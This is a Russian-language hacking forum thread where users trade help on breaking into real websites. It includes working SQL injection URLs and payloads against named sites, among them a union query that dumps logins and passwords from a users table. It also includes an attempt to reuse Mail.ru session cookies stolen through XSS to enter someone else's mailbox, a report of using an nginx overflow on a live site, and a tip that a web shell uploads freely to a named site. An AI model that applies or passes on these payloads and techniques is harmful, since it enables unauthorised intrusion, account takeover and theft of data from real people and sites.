Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Вопрос касательно хсс на маилру
    украл я куки к примеру лежат они у меня на сниффере
    Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика
    После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся...
    Как я понял в маилру главная кука отвечающая за вход Mpop
    меняю mpop в опере и открываю маилру

    и что же вы думаете? зашел? - НЕТ
    просит ввести заново пароль при этом кука больше не работает!!
    Какже зайти на почту с чужих кук?
     
  2. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    539
    Likes Received:
    49
    Reputations:
    54
    Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
     
  3. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Немного поэксперементировав я пришел к некому результату но всёже это ещё не результат...

    Залогинился в опере, заюзал xss , открыл сниифер - куки уже тут.
    Открываю фаерфокс и плагин в нем (Live http replay)
    мне нужен был именно он так как очень просто можно заменить все куки запроса

    Вобщем открываю главную, ловлю запрос , меняю в нем куки на те что пришли на сниффер, повторяю запрос и вижу что я типо залогинен с почты которая насамом деле открыта у меня в опере.
    Конечно же зайти на неё не удалось так как куки переданные плагином не сохранились в браузер.

    Переберал все возможные комбинации и оказалось что для этого хватит всего одной куки Mpop и страница также будет показывать что я якобы залогинен. :(

    А если куку Mpop просто сунуть в браузер и сохранить то она умрет и меня попросит ввести пассворд повторно.
     
  4. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    249
    Likes Received:
    35
    Reputations:
    24
    Народ, помогите вывести таблицы..
    Code:
    http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand(0)*%202))having+min(0)+or+1
     
  5. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    SELECT 1 from information_schema.tables group by concat((SELECT table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0)
     
    1 person likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    В Opencart скуля?
     
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    Там фильтруется нижнее подчеркивание.
     
    _________________________
    1 person likes this.
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    Старая. С бородой уже.
     
    _________________________
  9. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    В общем заюзал на одном сайте Nginx stack-based buffer overflow
    Он выдал вот такую инфу

    [​IMG]

    Как это можно использовать.. Для чего эти байты?
     
  10. sergei1105

    sergei1105 New Member

    Joined:
    15 Jan 2014
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    HTTP parameter pollution что за уязвимость?
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    Зайди в гугл, ввел HTTP parameter pollution.
    Открой первую вкладку http://raz0r.name/articles/http-parameter-pollution и прочитай.
     
    _________________________
  12. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    приветствую
    понять не могу что за база
    на "
    SearchEngineException: parsefql: Query Error: line 1:100: unexpected token:
    ,linguistics=off),boost=1000), not(*.swf), not(*filtertable*), not(*multimedia_layer_library*), not(*.flash.html), not(*.isng.*), not(*tabcontent*), not(*Search_Results*), not(*medialibrary*), not(*.ngrb.*), not(*media_library*), not(*.pid.*), not(*.redirect.*),filter(and(language:

    ")ORDER BY 1
    SearchEngineException: parsefql: Query Error: line 1:100: unexpected token: ORDER
    ")and(select null)
    SearchEngineException: parsefql: Query Error: line 1:111: unexpected token: null

    хелп..
     
  13. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Посоветуйте пожалуйста нормальный гуи для sqlmap
    Особенно важна поддержка иньекций в куках
     
  14. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Подскажите пример реализации

    https://www.site.com/login

    POST

    PARAM: firstN=&lastN=

    DB: ORACLE

    c чего начать?
     
  15. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    В разделе ИЗБРАННОЕ смотрел?
     
  16. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    53
    Likes Received:
    16
    Reputations:
    0
    Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
    Пробовал Havij и sqlmap
     
  17. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Уверен,что там есть данные?ручками пробовал?
     
  18. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    539
    Likes Received:
    49
    Reputations:
    54
    А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?
     
  19. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    249
    Likes Received:
    35
    Reputations:
    24
    Есть сайт со скулей
    Code:
    http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+
    и админка но ни одна из учёток не подходит. Расскажите, в чём подвог?

    2. Не подбирается кол-во столбцов.
    Code:
    www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+
     
    #22959 Unknowhacker, 21 Jan 2014
    Last edited: 21 Jan 2014
  20. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126

    http://kerch.biz/upload.php
    Спокойно шелл грузится.
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.